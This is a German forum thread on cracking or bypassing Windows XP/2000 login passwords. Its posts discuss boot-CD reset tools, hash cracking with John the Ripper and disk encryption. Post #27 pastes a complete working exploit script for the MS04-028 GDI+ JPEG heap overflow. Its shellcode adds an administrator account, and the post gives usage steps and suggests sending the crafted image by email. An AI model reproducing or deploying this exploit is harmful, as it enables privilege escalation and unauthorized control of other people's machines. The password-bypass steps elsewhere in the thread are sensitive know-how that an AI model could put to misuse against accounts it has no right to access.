Windows XP/NT/2k/Vista Kennwörter "knacken" bzw. Passwort umgehen

#16 @Dafra + Laserpointa

Ich finde bei Methoden richtig klasse. Habe schon viel davon gehört (und es war mir eigentlich auch klar) dass es Tools für so etwas geben müsste. Bin aber noch nie über solche gestolpert. Eigentlich ist es schon erschreckend, wenn man überlegt, dass man nur physischen Zugriff zu nem Systzem braucht und schon kann man eigentlich machen, was man will.

Ich kenne auch ein nettes Tool. Bin mal auf den "ERD Commander" gestoßen. Das ist ein Windows auf CD. Quais wie Knoppix:
- Man legt einfach die CD ein.
- Startet über CD
- Wartet etwas (je nach Geschwindigkeit von CD und Rechner dauert es etwas)
- Dann kommt man in ein Auswahlmenü. Der ERD Commander erkennt die installierten Systeme und frag dann, an welchem man sich anmelden möchte.
- Man wählt das gewünschte aus und ERD Commander läd das System ohne irgendwelche Benutzernamen und Passwörter.
- Nun hat man freien Zugriff auf alle Daten und Accounts.

Es ist ein sehr nettes um Daten zu retten oder Passwörter zurückzusetzten.


Gruß Spike
__________
Wenn wir bedenken, dass wir alle verrückt sind, ist das Leben erklärt.
(Mark Twain)

#17 Also ich habe jetzt mit dem Offline NT Password & Registry Editor, link nochmal hier auf folgenden Maschinen das Admin-Passwort zurückgesetzt:
- WIN2000 FAT32
- WIN2000 NTFS
- WIN XP SP1 NTFS
- WIN XP SP2 NTFS

Ich muss sagen, was Einfacheres und Bequemeres habe ich noch nicht gesehen. Du bootest mit ner Diskette. Alles wird automatisch erkannt, du brauchst nur enter oder y oder n zu drücken. An einer Stelle gibst du * ein, und das ist auf der amerikanischen Tastatur die Klammer auf. Fertig.
Eine Einschränkung gibt es für das Admin-PW auf einem Server mit Active Directory: das ist ziemlich kompliziert.

R

#18 HI
hab als admin mein Pw vergessen weil ich diesen PC lang nicht mehr genutzt habe kann mich nur noch als GAst anmelden. hab die Lösung von Dafra ausprobiert geht aber nicht kommt
Logon to \\127.0.0.1\ADMIN$ failed: code 1231
kann aber nichts damit anfangen was astrubael damit meint :
Gib bitte nächstes Mal an welche Windows-Scheunentore man offen lassen muss, damit es funktioniert
Kann mir jemand helfen

#19 @thebestk2
Du brauchst Admin rechte, um das Passwort einsehen zu können, wenn du diese nicht hast, musst du eine andere Methode ausprobieren (CIA Commander)
MFG
DAFRa

#20 hi,

also ich hab auch mein adminpasswort vergessen... aber eher mal als test wie schnell mein system geknackt wird.

habe SGE4.1 drauf also kann ich booten von irgendwelchen cd´s vergessen ...

habe mich nun als admin an meine maschine angemeldet der andere Benutzer, also mein arbeitsprofil soll geknackt werden....

ha ein pass genommen mit 12 stellen mal schauen wie lange john braucht...

mhh beim status seh ich nicht was mir zeigt wo er grad ist ...



macht john auch sonderzeichen wie !"§$%&/()=?`@@@ oder sowas ?

#21 Es sollten alle Zeichen genommen werden, aber bei 12 Zeichen, kann es schon so 2 Wochen oder so dauern
Vielleicht auch 2 Monate oder so was in der Richtung, also für ein 6 stelliges ohne SOnderzeichen hat er bei mir 24 stunden gebraucht....
MFG
DAFRA

#22 soho er kämpft immer noch ...

nach ca 10 h hatte er ein teilstück meines passwortes die letzten 4 zeichen ....

mittlerweile ist mir eingefallen, dass wenn ich mich als admin an das system anmelde kann ich ja das pass zurücksetzten ohne dass es geknackt werden muss ..

wie kann ich dass umgehen, dass niemand mit dieser methode mein pass rausfinden kann ???


fällt mir grad ein !
kann ich auch rar dateien mit der methose knacken oder ist das proggie dafür nicht geeignet ?

cu
thunderbolt

#23 Ach ja, er wird mit dieser Methode ja alle Passwörter knacken, normaler weise reicht ja das Admin Passwort, in dem Falle musst du aus der Txt Datei die andren einfach rauslöschen, dann sollte er nur das admin knacken......

Rar Dateien kannst du damit nicht entschlüsseln....
Und da der Admin alles darf, kann er natürlich auch die Passwörter ändern wenn er angemeldet ist. Um dies zu verhindern, musst du einfach ein sicheres Passwort verwenden, damit man sich erst gar nicht anmelden kann.
MFG
DAFRA

#24 Hallo Tunderbolt,

also weißt du, der Admin ist ja gerade dafür gemacht worden, dass er vollen Zugriff auf das System hat. Warum sollte man das denn verhindern?
Insofern verstehe ich nicht, was du meinst. Schließlich gibt es ja das abgestufte System von Usern mit verschiedenen Zugriffsrechten.

Letzten Endes kannst du kaum verhindern, dass sich jemand - auch ohne Admin-Rechte - Zugang zu deiner Festplatte verschafft. Du kannst mit einer Linux-Bootdisk das Admin-PW zurücksetzen (siehe weiter oben in diesem Thread). Dagegen kannst du das Booten mit Diskette oder CD im BIOS verhindern. Dann wieder kommt einer und flasht dir das BIOS. Jetzt baust du einen Hardwareschutz ein, der das Flashen verhindert.
Aber gegen das Aufschrauben des Rechners kommst du so leicht nicht an (Abklemmen der Batterie oder Ausbauen der Festplatte ). Vielleicht hilft es dir, wenn du die ganze Festplatte verschlüsselst, aber damit habe ich keine Erfahrungen, auch nicht mit ziemlich teuren Profi-Hardwareschutz-Mechanismen.

Also ich finde diese ganzen Passwort Recoverer sind in den meisten Fällen nur Spielerei, denn sie arbeiten nur dann, wenn du sowieso schon Admin bist, denn an die Hashes kommst du mit Windows nicht ran (ok, linux kann das). Sinn macht das Ganze doch eigentlich nur, wenn du PWs von einfachen Usern rausfinden willst, die ihr PW vergessen haben, und auch dann nur, wenn du nicht Tage dazu brauchst.
Dies gilt für: john, pwdump3, ntcrack, samdump und auch für den Profi der Knacker @stakeLCx.

Gruß Reinhart

#25 Ich möchte die Aufgabenstellung gerne etwas erweitern. Wenn man jetzt aber keinen Adminaccount hat auch nicht an die Maschine ran kann? Was dann? Wie bei uns geschehen.

Unser Kunde hat mehrere Niederlassungen in Deutschland. Der ortsansässige Dienstleister ist gegangen worden und hat das Adminpasswort mitgenommen. Bootdisk bringt nichts, der DC bootet nur von HDD. Im Bios umstellen mit einem Laien am anderen Ende des Telefon und ohne das man das Bios kennt, schwierig. Haben wir probiert. Bleib also nur hinfahren. Einige hundert Kilometer. Es sei den man kommt auch ohne Adminrechte und nur über IP ran. Eine VNP-Verbindung gibt es und die Terminaldienste laufen noch.

Jemand eine Idee?

Würde uns viel Zeit und dem Kunden Geld sparen.

Gruss Alex

#26 HI,

thx erstmal für das schnelle reply....

also ich hol erstmal weiteraus ...

vor ca. 2 Jahren waren die buben in grün/weis bei mir und haben alles mitgenommen was sie gefunden haben. Grund war ein ganz banaler, ein typ bei ebay sagte er hätte ware bezahlt aber nie bekommen. Anzeige folge und ich bekam besuch. Nun sind 2 Jahre vergangen alles wunderbar aber ich würde meinem Rechner schon soweit schützen wie es geht.... falls ich nochmal besuch bekomme !

momentan hab ich SGE 4.1 aufm rechner mit der prebootpasswordabfrage .. sobald der Rechner von ner cd oder bootdisk gestartet wird kann keiner auf meine platten zugreifen, nur löschen ...

umgehen kann man dies abfrage hoffentlich nicht ... pswd hat 15 stellen mit sonderzeichen usw.

nun kommt immer der anmeldebildschirm von windows und dort soll auch ein pswd rein. nur was nutzt mir das pswd wenn irgendjemand sich als admin anmeldet und so auch zugriff auf meine daten hat.

Die einzige möglichkeit die ich momentan sehe ist, es adminpassword zu erstellen und um den zugriff auf den admin zu verhindern, da ja niemand mit der linux cd oder sonstwas auf meinen rechner zugreifen kann und die pswd´s auslesen kann. der komplette festplatteninhalt aller meiner Platten ist mit rijandel256 verschlüsselt.. also hat er keine schanze mit der cd aus einem alternativen system die passwörter auszulesen.

so, sollte es nun doch irgendwie möglich sein die präbootpasswordabfrage zu umgehen, stehe ich blöd da, weil er nun zumindest bis zum Windowslogon kommt ... und meine Daten, sofern er das Prebootpassword wusste unverschlüsselt sehen kann, sofern er es schafft am logon vorbeizukommen.

#27 Hm, man könnte mit einem Exploit versuchen Admin Rights zu bekommen, dann halt entweder das Passwort zurücksetzen oder das verschlüsselte Passwort kopieren und entschlüsseln.

Ich selbst kenne mich jetzt nicht besonders gut in C++ aus, aber vielleicht hilft dass ja weiter:

Zitat

// CAN-2004-0200

#!/bin/sh
#
# MS04-028 Exploit PoC II with Shellcode: CreateUser X in Administrators Group
#
# Tested on:
# WinXP Professional English SP1 - GDIPLUS.DLL version 5.1.3097.0
# WinXP Professional Italian SP1 - GDIPLUS.DLL version 5.1.3101.0
# (SP2 is not vulnerable, don't waste your time trying this exploit on it!)
#
# Usage:
# first, replace the "\xCC" = INT3 instruction at beginning of shellcode
# second, choose a right ret address for GDI+ DLL and WinXP version
# then, create crafted JPEG with: sh ms04-028.sh > img.jpg
#
# Created by:
# Elia Florio
# (heap overflow study purpose, not for lamerz, not for script-kiddie)
#
# Thanx to:
# jerome.athias
# metasploit.org
# idefense
# full-disclosure list

#********************************************
#Standard JPEG header
#********************************************
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64\x00\x60\x00\x00"
printf "\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00\x04\x00\x00\x00\x0A\x00\x00"
printf "\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\xC0\x00\x00\x00\x01"

#********************************************
#Heap Overflow Trigger DWORD - 00 length field (01 works too)
#********************************************
printf "\xFF\xFE\x00\x01"


#********************************************
#Additional stuff to complete the header
#********************************************
printf "\x00\x14\x10\x10\x19\x12\x19\x27\x17\x17\x27\x32"


#********************************************
#Sugg. by jerome.athias
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
#********************************************
printf "\xEB\x0F\x26\x32" #control ECX register


#********************************************
#Address of shellcode
#********************************************
printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
#printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0


#********************************************
#end_of_jpeg_header
#********************************************
printf "\x26\x2E\x3E\x35\x35\x35\x35\x35\x3E"
#NOP1
printf "\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
printf "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"

#********************************************
#Image junk here...fake JPG
#********************************************
printf
"\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf
"\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf
"\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf
"\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf
"\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf
"\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf
"\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf
"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf
"\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf
"\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf
"\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf
"\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf
"\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf
"\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf
"\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf
"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf
"\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf
"\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf
"\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf
"\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf
"\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf
"\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf
"\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf
"\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf
"\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf
"\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf
"\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf
"\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf
"\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf
"\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf
"\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf
"\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf
"\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";

#********************************************
#"A" buffer
#********************************************
perl -e 'print "\x41"x1601'; #buffer 1601 x NOP

#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\xCC\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it
works!

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for
your Framework, is great!)
#********************************************
printf "\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3"
printf "\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68"
printf "\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68"
printf "\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89"
printf "\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53"
printf "\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31"
printf "\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00"
printf "\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69"
printf "\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89"
printf "\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51"
printf "\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49"
printf "\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00\xff\x56\x14"
printf "\xff\x56\x0c\x56\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
printf "\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24\x18"
printf "\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01"
printf "\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38"
printf "\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1"
printf "\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
printf "\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

#********************************************
#end_of_jpeg
#********************************************
printf "\xFF\xD9";

Mehr Exploits für Admin Rights gibts auf: http://www.k-otik.com
Sowas funktioniert aber auch nur, wenn man wie gesagt zum Beispiele eine Email empfangen kann, wo dieses Exploit (indem Falle als JPG getarnt) angehängt ist.

#28 Email empfangen geht und Anhang muss nicht mal getarnt sein, aber C++ hmm.

#29 hab noch was dazugeschrieben oben !!

#30 @pope , zu deiner Frage:
Habt ihr denn schonmal probiert, die CMOS-Batterie abzuklemmen? Dann müsste das BIOS eigentlich mit seinen Default-Einstellungen starten.